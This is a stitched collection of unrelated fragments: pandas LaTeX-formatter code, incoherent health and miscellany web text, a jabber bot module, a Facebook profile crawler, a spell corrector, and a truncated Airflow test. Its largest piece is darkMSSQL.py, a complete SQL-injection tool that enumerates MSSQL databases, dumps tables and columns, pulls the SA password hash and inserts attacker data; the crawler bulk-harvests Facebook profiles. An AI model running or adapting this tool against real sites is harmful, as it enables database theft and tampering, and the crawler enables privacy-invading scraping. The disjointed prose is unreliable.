self.fmt = formatter
self.frame = self.fmt.frame
self.longtable = longtable
self.column_format = column_format
self.multicolumn = multicolumn
self.multicolumn_format = multicolumn_format
self.multirow = multirow
self.caption, self.short_caption = _split_into_full_short_caption(caption)
self.label = label
self.position = position
def to_string(self) -> str:
"""
Render a DataFrame to a LaTeX tabular, longtable, or table/tabular
environment output.
"""
return self.builder.get_result()
@property
def builder(self) -> TableBuilderAbstract:
"""Concrete table builder.
Returns
-------
TableBuilder
"""
builder = self._select_builder()
return builder(
formatter=self.fmt,
column_format=self.column_format,
multicolumn=self.multicolumn,
multicolumn_format=self.multicolumn_format,
multirow=self.multirow,
caption=self.caption,
short_caption=self.short_caption,
label=self.label,
position=self.position,
)
def _select_builder(self) -> Type[TableBuilderAbstract]:
"""Select proper table builder."""
if self.longtable:
return LongTableBuilder
if any([self.caption, self.label, self.position]):
return RegularTableBuilder
return TabularBuilder
@property
def column_format(self) -> Optional[str]:
"""Column format."""
return self._column_format
@column_format.setter
def column_format(self, input_column_format: Optional[str]) -> None:
"""Setter for column format."""
if input_column_format is None:
self._column_format = (
self._get_index_format() + self._get_column_format_based_on_dtypes()
)
elif not isinstance(input_column_format, str):
raise ValueError(
f"column_format must be str or unicode, "
f"not {type(input_column_format)}"
)
else:
self._column_format = input_column_format
def _get_column_format_based_on_dtypes(self) -> str:
"""Get column format based on data type.
        Right alignment for numbers, left alignment for strings.
"""
def get_col_type(dtype):
if issubclass(dtype.type, np.number):
return "r"
return "l"
dtypes = self.frame.dtypes._values
return "".join(map(get_col_type, dtypes))
def _get_index_format(self) -> str:
"""Get index column format."""
return "l" * self.frame.index.nlevels if self.fmt.index else ""
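# Usage sketch (comments only; mirrors the builder doctests above rather than
# documenting a public API, and assumes a DataFrameFormatter instance):
#
#   from pandas import DataFrame
#   from pandas.io.formats import format as fmt
#   df = DataFrame({"a": [1, 2], "b": ["b1", "b2"]})
#   formatter = fmt.DataFrameFormatter(df)
#   print(LatexFormatter(formatter).to_string())                  # tabular
#   print(LatexFormatter(formatter, longtable=True).to_string())  # longtable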
def _escape_symbols(row: Sequence[str]) -> List[str]:
"""Carry out string replacements for special symbols.
Parameters
----------
row : list
        List of strings that may contain special symbols.
Returns
-------
list
        List of strings with the special symbols replaced.
"""
return [
(
x.replace("\\", "\\textbackslash ")
.replace("_", "\\_")
.replace("%", "\\%")
.replace("$", "\\$")
.replace("#", "\\#")
.replace("{", "\\{")
.replace("}", "\\}")
.replace("~", "\\textasciitilde ")
.replace("^", "\\textasciicircum ")
.replace("&", "\\&")
if (x and x != "{}")
else "{}"
)
for x in row
]
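# For example (illustrative call, following the replacements above):
#   _escape_symbols(["50%", "a_b", ""]) returns ["50\%", "a\_b", "{}"]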
def _convert_to_bold(crow: Sequence[str], ilevels: int) -> List[str]:
"""Convert elements in ``crow`` to bold."""
return [
f"\\textbf{{{x}}}" if j < ilevels and x.strip() not in ["", "{}"] else x
for j, x in enumerate(crow)
]
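# For example, with one index level only the first cell is bolded:
#   _convert_to_bold(["0", "a", "b"], ilevels=1) returns ["\textbf{0}", "a", "b"]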
if __name__ == "__main__":
import doctest
doctest.testmod()
|
1001 Home Health Remedies 2008 Reader's Digest Association Pdf - Classification. Classically, "lead poisoning" or "lead intoxication" has been defined as exposure to high levels of lead typically associated with severe health effects. Poisoning is a pattern of symptoms that occurs with toxic effects from mid to high levels of exposure; toxicity is a wider spectrum of effects, including subclinical ones (those that do not cause symptoms). Other. Neonatal herpes simplex is an HSV infection in an infant. It is a rare but serious condition, usually caused by vertical transmission of HSV-1 or -2 from mother to newborn. During immunodeficiency, herpes simplex can cause unusual lesions in the skin. Answers.com is the place to go to get the answers you need and to ask the questions you want.
Both a contract drafter and a contract reviewer can save some time by first reviewing — together — the Common Draft short-form contract drafts (as well as other clause titles) and discussing just what types of provisions they want in their document. After Rockefeller's unceremonious ejection, the yacht was then buzzed by Blackhawk helicopters before French fighter jets gave a warning pass overhead, whereupon the helicopters retreated. Ginger: An Ancient Panacea for Modern Times (By Brenda Castro) INTRODUCTION. Known as vishwabheshaja, "the universal medicine", ginger (zingiber officinale) has been a panacea for digestive, respiratory, and circulatory disorders for thousands of years.1,2 Ginger's versatility is found in ancient Ayurvedic texts, international cuisine, and a broad spectrum of home remedies.
How the beta glucan fiber in brewer's, baker's, and nutritional yeast can improve wound healing and, potentially, anti-cancer immunity. Below is an approximation of this video's audio content. To see any graphs, charts, graphics, images, and quotes to which Dr. Greger may be referring, watch the video. |
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Share the c0de!
# darkc0de Crew
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, Tarsian, rechemen, c0mrade (r.i.p brotha), reverenddigitalx
# and the darkc0de crew
# Thanks to inkubus for helping me beta
# NOTES:
# Proxy function may be a little buggy if you're using public proxies... Test your proxy prior to using it with this script..
# The script does do a little proxy test.. it does a GET to google.com; if data comes back it's good... no data = failed and the proxy
# will not be used. This is an effort to keep the script from getting stuck in an endless loop.
# Any other questions Hit the forums and ask questions. google is your friend!
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage caused! User assumes all responsibility
# Intended for authorized Web Application Pen Testing Only!
# BE WARNED, THIS TOOL IS VERY LOUD..
import sys, re, os, socket, urllib2, time, random, cookielib, string
#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|\n"
sys.exit(1)
#help option
for arg in sys.argv:
if arg == "-h":
print " Usage: ./darkMSSQL.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --info Gets MySQL server configuration only."
print "\tDefine: --dbs Shows all databases user has access too."
print "\tDefine: --schema Enumerate Information_schema Database."
print "\tDefine: --dump Extract information from a Database, Table and Column."
print "\tDefine: --insert Insert data into specified db, table and column(s)."
print "\n\tRequired:"
print "\tDefine: -u URL \"www.site.com/news.asp?id=2\" or \"www.site.com/index.asp?id=news'\""
print "\n\tMode dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default is darkMSSQLlog.txt"
print "\tDefine: -r \"-r 20\" this will make the script resume at row 20 during dumping"
print "\tDefine: --cookie \"cookie_file.txt\""
print "\tDefine: --debug Prints debug info to terminal."
print "\n Ex: ./darkMSSQL.py --info -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --dbs -u \"www.site.com/news.asp?id=2\""
print " Ex: ./darkMSSQL.py --schema -u \"www.site.com/news.asp?id=2\" -D dbname"
print " Ex: ./darkMSSQL.py --dump -u \"www.site.com/news.asp?id=2\" -D dbname -T tablename -C username,password"
print " Ex: ./darkMSSQL.py -u \"www.site.com/news.asp?news=article'\" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass"
print
sys.exit(1)
#define variables
site = ""
dbt = "darkMSSQLlog.txt"
proxy = "None"
count = 0
basicinfo = ["@@VERSION","USER","DB_NAME()","HOST_NAME()",]#@@SERVERNAME] *SEVERNAME causes errors on some 2000 servers
db_num = 0
top_num = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_insert = "None"
arg_debug = "off"
arg_cookie = "None"
col_url = ""
insert_url = ""
selected_col = ""
inserted_data = ""
mode = "None"
gets = 0
row_num = 0
#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "--debug":
arg_debug = "on"
elif arg == "--cookie":
arg_cookie = sys.argv[count+1]
elif arg == "--insert":
mode = arg
arg_insert = sys.argv[count+1]
elif arg == "-r":
row_num = sys.argv[count+1]
top_num = sys.argv[count+1]
count+=1
#Title write
file = open(dbt, "a")
print "\n|------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v2.0 |"
print "| 10/2008 darkMSSQL.py |"
print "| -MSSQL Error Based Database Enumeration |"
print "| -MSSQL Server Information Enumeration |"
print "| -MSSQL Data Extractor |"
print "| Usage: darkMSSQL.py [options] |"
print "| [Public Beta] -h help darkc0de.com |"
print "|------------------------------------------------|"
file.write("\n|------------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com v2.0 |")
file.write("\n| 10/2008 darkMSSQL.py |")
file.write("\n| -MSSQL Error Based Database Enumeration |")
file.write("\n| -MSSQL Server Information Enumeration |")
file.write("\n| -MSSQL Data Extractor |")
file.write("\n| Usage: darkMSSQL.py [options] |")
file.write("\n| [Public Beta] -h help darkc0de.com |")
file.write("\n|------------------------------------------------|")
#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and specify a mode."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --info, --dbs, --schema, --dump, --insert"
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "\n[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "\n[-] You must include -D, -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if site[:4] != "http":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
if arg_cookie != "None":
try:
cj = cookielib.MozillaCookieJar()
cj.load(arg_cookie)
cookie_handler = urllib2.HTTPCookieProcessor(cj)
except:
print "[!] There was a problem loading your cookie file!"
print "[!] Make sure the cookie file is in Mozilla Cookie File Format!"
print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n"
sys.exit(1)
else:
cookie_handler = urllib2.HTTPCookieProcessor()
if arg_columns != "None":
arg_columns = arg_columns.split(",")
for column in arg_columns:
col_url += "%2bconvert(varchar,isnull(convert(varchar,"+column+"),char(32)))%2bchar(58)"
if arg_insert != "None":
arg_insert = arg_insert.split(",")
#General Info
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site)
print "[+] %s" % time.strftime("%X")
file.write("\n[+] %s" % time.strftime("%X"))
print "[+] Cookie:", arg_cookie
file.write("\n[+] Cookie: "+arg_cookie)
#Build proxy list
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("\n[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener(cookie_handler))
proxy_num = 0
proxy_len = len(proxy_list)
#URL Get Function
def GetTheShit(head_URL):
try:
if arg_debug == "on":
print "\n[debug]",head_URL
file.write("\n[debug] "+head_URL)
try:
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
except urllib2.HTTPError, e:
source = e.read()
match = re.findall("value '[\d\D]*' to",source)
match = match[0][7:-4]
return match
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
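# Example of the error text GetTheShit() parses (a typical MSSQL conversion
# error; exact wording varies by server version and is shown for illustration):
#   Conversion failed when converting the varchar value 'master' to data type int.
# The regex "value '[\d\D]*' to" grabs the quoted chunk; match[0][7:-4] then
# strips the surrounding "value '" and "' to", leaving just the extracted value.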
# Here are the modes!
if mode == "--info":
print "[+] Displaying information about MSSQL host!\n"
file.write("\n[+] Displaying information about MSSQL host!\n")
site_URL = site+"+or+1=convert(int,(darkc0de))--"
for baseinfo in basicinfo:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(baseinfo))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "[-] We seem to be having a problem! Check it out manually!"
print "[-] "+str(head_URL)
print "\n[-] Done"
sys.exit(1)
if baseinfo == "@@VERSION":
ver_info = the_juice
print "[+]",baseinfo+":",the_juice
file.write("\n[+] "+baseinfo+": "+the_juice)
print "\n[+] Script detected Microsoft SQL Version:",ver_info[21:26]
file.write("\n\n[+] Script detected Microsoft SQL Version: "+ver_info[21:26])
if ver_info[25] == "0":
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.dbo.fn_varbintohexstr(password)+from+master..sysxlogins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
else:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+master.sys.fn_varbintohexstr(password_hash)+from+master.sys.sql_logins+where+name='sa'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
yesno = "Nope!"
else:
yesno = "Yes! w00t w00t! Time to break out sqlninja!"
print "[+] Checking to see if we can view password hashs...", yesno
file.write("\n[+] Checking to see if we can view password hashs... "+yesno)
if yesno != "Nope!":
print "[!] Dumping SA Account info:"
file.write("\n[!] Dumping SA Account info:")
print "\tUsername: SA"
file.write("\n\tUsername: SA")
print "\tSalt:",the_juice[6:14]
file.write("\n\tSalt: "+the_juice[6:14])
print "\tMixedcase:",the_juice[15:54]
file.write("\n\tMixedcase: "+the_juice[15:54])
print "\tUppercase:",the_juice[55:]
file.write("\n\tUppercase: "+the_juice[55:])
print "\tFull Hash:",the_juice
file.write("\n\tFull Hash: "+the_juice)
if mode == "--dbs":
print "[+] Displaying list of all databases on MSSQL host!\n"
file.write("\n[+] Displaying list of all databases on MSSQL host!\n")
while 1:
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(DB_NAME(darkc0de)))--"
head_URL = head_URL.replace("darkc0de",str(db_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
db_num+=1;row_num+=1
if mode == "--schema":
#List Tables
if arg_database != "None" and arg_table == "None":
print "[+] Displaying tables inside DB: "+arg_database+"\n"
file.write("\n[+] Displaying tables inside DB: "+arg_database+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+table_name+from+"+arg_database+".information_schema.tables+where+table_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+table_name+FROM+"+arg_database+".information_schema.tables+ORDER+BY+table_name)+ORDER+BY+table_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this database!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
#List Columns
if arg_table != "None":
print "[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n"
file.write("\n[+] Displaying Columns inside DB: "+arg_database+" and Table: "+arg_table+"\n")
site_URL = site+"+or+1=convert(int,(select+top+1+column_name+from+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+AND+column_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+column_name+FROM+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+ORDER+BY+column_name)+ORDER+BY+column_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this table!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
if mode == "--dump":
print "[+] Dumping data from DB: "+arg_database+", Table: "+arg_table+", Column: "+str(arg_columns)+"\n"
site_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]
site_URL = site_URL+"+NOT+in+(SELECT+TOP+darkc0de+"+arg_columns[0]+"+from+"+arg_database+".."+arg_table+")))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if row_num == 1:
print "[-] We seem to be having a problem!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
break
the_juice = string.rstrip(the_juice,":")
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num = int(top_num) + 1;row_num = int(row_num) + 1
if mode == "--insert":
print "[+] Inserting data into..."
print "\tDB: "+arg_database
print "\tTable: "+arg_table
print "\tColumn(s):\tData to be inserted:\n"
try:
for x in range(0, len(arg_columns)):
print "\t["+str(x)+"] "+arg_columns[x]+"\t"+arg_insert[x]
except:
pass
for column in arg_columns:
selected_col += column+","
selected_col = selected_col.rstrip(",")
for data in arg_insert:
inserted_data += "'"+data+"',"
inserted_data = inserted_data.rstrip(",")
gets+=1;proxy_num+=1
head_URL = site+";INSERT+INTO+"+arg_table+"("+selected_col+")+VALUES("+inserted_data+")--"
print "\n[!] Inserting Data....",
the_juice = GetTheShit(head_URL)
print "Done!"
print "\n[+] Was the data inserted?"
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]+"='"+arg_insert[0]+"'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "\n[-] Does not look like the data was inserted!"
else:
the_juice = the_juice.rstrip(":")
print "\t"+the_juice
print "[!] Data was successfully inserted!"
# Closing Info
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
|
HVAC Tip: Why is my variable speed air handler not bringing the blower up to the correct speed? Plus common wiring mistakes to avoid.
Better indoor air and fewer hot and cold spots in your home: discover all the advantages of a variable speed fan motor on your HVAC system. |
# jsb/drivers/sleek/message.py
#
#
""" jabber message definition .. types can be normal, chat, groupchat,
headline or error
"""
## jsb imports
from jsb.utils.exception import handle_exception
from jsb.utils.trace import whichmodule
from jsb.utils.generic import toenc, fromenc, jabberstrip
from jsb.utils.locking import lockdec
from jsb.lib.eventbase import EventBase
from jsb.lib.errors import BotNotSetInEvent
from jsb.lib.gozerevent import GozerEvent
## basic imports
import types
import time
import thread
import logging
import re
## locks
replylock = thread.allocate_lock()
replylocked = lockdec(replylock)
## classes
class Message(GozerEvent):
""" jabber message object. """
def __init__(self, nodedict={}):
self.element = "message"
self.jabber = True
self.cmnd = "MESSAGE"
self.cbtype = "MESSAGE"
self.bottype = "xmpp"
self.type = "normal"
self.speed = 8
GozerEvent.__init__(self, nodedict)
def __copy__(self):
return Message(self)
def __deepcopy__(self, bla):
m = Message()
m.copyin(self)
return m
def parse(self, data, bot=None):
""" set ircevent compat attributes. """
logging.info("starting parse on %s" % str(data))
self.bot = bot
self.jidchange = False
self.jid = str(data['from'])
self.type = data['type']
if not self.jid: logging.error("can't detect origin - %s" % data) ; return
try: self.resource = self.jid.split('/')[1]
except IndexError: pass
self.channel = self.jid.split('/')[0]
self.origchannel = self.channel
self.nick = self.resource
self.ruserhost = self.jid
self.userhost = self.jid
self.stripped = self.jid.split('/')[0]
self.printto = self.channel
try: self.txt = str(data['body']) ; self.nodispatch = False
except AttributeError: self.txt = "" ; self.nodispatch = True
self.time = time.time()
logging.warn("message type is %s" % self.type)
if self.type == 'groupchat':
self.groupchat = True
self.auth = self.userhost
else:
self.showall = True
self.groupchat = False
self.auth = self.stripped
self.nick = self.jid.split("@")[0]
self.msg = not self.groupchat
self.fromm = self.jid
self.makeargs()
self.bind(self.bot)
self.issleek = True
return self
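    # Example of the JID handling in parse() (illustrative values only):
    #   data['from'] = "alice@example.org/laptop" yields
    #   channel/stripped = "alice@example.org" and resource = "laptop";
    #   for non-groupchat messages nick is then rebound to "alice".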
def errorHandler(self):
""" dispatch errors to their handlers. """
try:
code = self.get('error').code
except Exception, ex:
handle_exception()
try:
method = getattr(self, "handle_%s" % code)
if method:
logging.error('sxmpp.core - dispatching error to handler %s' % str(method))
method(self)
except AttributeError, ex: logging.error('sxmpp.core - unhandled error %s' % code)
except: handle_exception()
def normalize(self, what):
return self.bot.normalize(what)
|
THE SOCIETY IS THE LEADING LEARNED SOCIETY for economists in the world, and the world-wide coverage is becoming even more important as economic science expands in regions outside of its traditional strongholds in North America and Europe. It has been both a privilege and a pleasure to serve as the Society’s President in the year of 2008.
One of the Society’s major activities is to publish high-quality research so as to further the objective of supporting economics with a quantitative-theoretical and quantitative-empirical orientation. The flagship journal Econometrica continues to be very well managed thanks to the devoted work by the Editor, Stephen Morris, assisted in the Princeton editorial office by Mary Beth Bellando, as well as the efforts of the six Co-editors and many Associate Editors. The Society’s Monograph Series was effectively edited by Andrew Chesher and George Mailath. In 2008, the Society also took important steps towards adding two new journals to its publications—more about this in Section 4 below. |
import json
import urllib2
#from threading import *
from pymongo import MongoClient
from xml.dom import minidom
from dicttoxml import dicttoxml
"""
t = Thread(target = conn_scan, args = (tgtHost, int(tgtPort)))
t.start()
"""
#screenLock = Semaphore(value = 1)
baseUrl = "http://graph.facebook.com/"
secureBaseUrl = "https://graph.facebook.com/"
token = "asdfasdf"
log = 0
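# Illustrative settings.xml matching the attribute lookups below (element and
# attribute names are inferred from the parsing code; values are placeholders):
#   <settings>
#     <crawl start="1"/><crawl end="1000"/>
#     <mongo ip="127.0.0.1"/><mongo port="27017"/><mongo log="1"/>
#     <fb token="YOUR_ACCESS_TOKEN"/>
#   </settings>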
# Kick off a crawler
def crawl(xmlFile):
    xmldoc = minidom.parse(xmlFile)
crawlSettings = xmldoc.getElementsByTagName('crawl')
start = int(crawlSettings[0].attributes['start'].value)
end = int(crawlSettings[1].attributes['end'].value)
mongoSettings = xmldoc.getElementsByTagName('mongo')
ipAddress = mongoSettings[0].attributes['ip'].value
port = int(mongoSettings[1].attributes['port'].value)
log = int(mongoSettings[2].attributes['log'].value)
fbTokenSettings = xmldoc.getElementsByTagName('fb')
token = fbTokenSettings[0].attributes['token'].value
if log == 1:
client = MongoClient(ipAddress, port)
db = client.facebookCrawler
users = db.users
userCount = 0
print "Starting crawl...Start: %s, End: %s" % (start, end)
for x in range(start, end):
try:
if x % 100 == 0:
print "Working...%s\n" % (x)
            urlToVisit = baseUrl + str(x)
data = json.load(urllib2.urlopen(urlToVisit))
if log == 1:
users.insert(data)
userCount += 1
print data['name']
except:
pass
print "\n" + str(userCount) + " Results Found!"
print "Done crawling"
# Kick off a crawler with privileges
def crawl_priv(xmlFile):
    xmldoc = minidom.parse(xmlFile)
crawlSettings = xmldoc.getElementsByTagName('crawl')
start = int(crawlSettings[0].attributes['start'].value)
end = int(crawlSettings[1].attributes['end'].value)
mongoSettings = xmldoc.getElementsByTagName('mongo')
ipAddress = mongoSettings[0].attributes['ip'].value
port = int(mongoSettings[1].attributes['port'].value)
log = int(mongoSettings[2].attributes['log'].value)
fbTokenSettings = xmldoc.getElementsByTagName('fb')
token = fbTokenSettings[0].attributes['token'].value
if log == 1:
client = MongoClient(ipAddress, port)
db = client.facebookCrawler
users = db.users
userCount = 0
print "Starting crawl with privileges...Start: %s, End: %s" % (start, end)
for x in range(start, end):
try:
if x % 100 == 0:
print "Working...%s\n" % (x)
urlToVisit = secureBaseUrl + str(x) + '?access_token=' + str(token)
data = json.load(urllib2.urlopen(urlToVisit))
if log == 1:
users.insert(data)
userCount += 1
print data['name']
except:
pass
print "\n" + str(userCount) + " Results Found!"
print "Done crawling"
# Search for a user
def search(xmlFile, name):
    xmldoc = minidom.parse(xmlFile)
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
name = name.replace(" ", "%20")
url = secureBaseUrl + 'search?q=' + str(name) + '&type=user&access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
print "Search returned %s results" % len(data['data'])
for x in range(0, len(data['data'])):
print count, '-', data['data'][x]['name']
count = count + 1
except:
print "Error retrieving search results"
# See what metadata you can get from a User
def meta(xmlFile, username):
    xmldoc = minidom.parse(xmlFile)
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
url = secureBaseUrl + str(username) + '?metadata=1&access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
for k, v in data['metadata']['connections'].items():
print count, '-', k
count = count + 1
xmldata = dicttoxml(data)
with open(username + "_metadata.xml", 'w') as file_handle:
file_handle.write(xmldata)
except:
print "Error retrieving metadata\n"
# Crawl a specific user
def username(xmlFile, user):
    xmldoc = minidom.parse(xmlFile)
crawlSettings = xmldoc.getElementsByTagName('fb')
token = crawlSettings[0].attributes['token'].value
url = secureBaseUrl + str(user) + '?access_token=' + str(token)
count = 1
try:
data = json.load(urllib2.urlopen(url))
xmldata = dicttoxml(data)
with open(user + ".xml", 'w') as file_handle:
file_handle.write(xmldata)
except:
print "Error retrieving user data\n"
|
By Studio 1-B. Also with 8-bit music. |
import re, collections
def words(text): return re.findall('[a-z]+', text.lower())
def train(features):
model = collections.defaultdict(lambda: 1)
for f in features:
model[f] += 1
return model
NWORDS = train(words(file('big.txt').read()))
alphabet = 'abcdefghijklmnopqrstuvwxyz'
def edits1(word):
splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
deletes = [a + b[1:] for a, b in splits if b]
transposes = [a + b[1] + b[0] + b[2:] for a, b in splits if len(b)>1]
replaces = [a + c + b[1:] for a, b in splits for c in alphabet if b]
inserts = [a + c + b for a, b in splits for c in alphabet]
return set(deletes + transposes + replaces + inserts)
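# For a word of length n, edits1 yields n deletes, n-1 transposes, 26n
# replaces and 26(n+1) inserts -- 54n+25 candidates before set() dedupes.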
def known_edits2(word):
return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)
def known(words): return set(w for w in words if w in NWORDS)
def correct(word):
candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]
return max(candidates, key=NWORDS.get)
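# Usage sketch (assumes big.txt, a large plain-text training corpus, sits in
# the working directory; Norvig's original used public-domain books):
#   print correct('speling')   # -> 'spelling' with a typical English corpus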
|
Want to try SCUBA diving and see what it's like?
After a briefing and some basics, the instructor takes you underwater to try diving in the shallow end of the pool and have some fun.
Everyone needs to fill out some paperwork before the class, and kids must have a parent's signature. |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import unittest
from copy import deepcopy
from airflow import configuration
from airflow.exceptions import AirflowException
from airflow.contrib.operators.ecs_operator import ECSOperator
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
RESPONSE_WITHOUT_FAILURES = {
"failures": [],
"tasks": [
{
"containers": [
{
"containerArn":
"arn:aws:ecs:us-east-1:012345678910:container/e1ed7aac-d9b2-4315-8726-d2432bf11868",
"lastStatus": "PENDING",
"name": "wordpress",
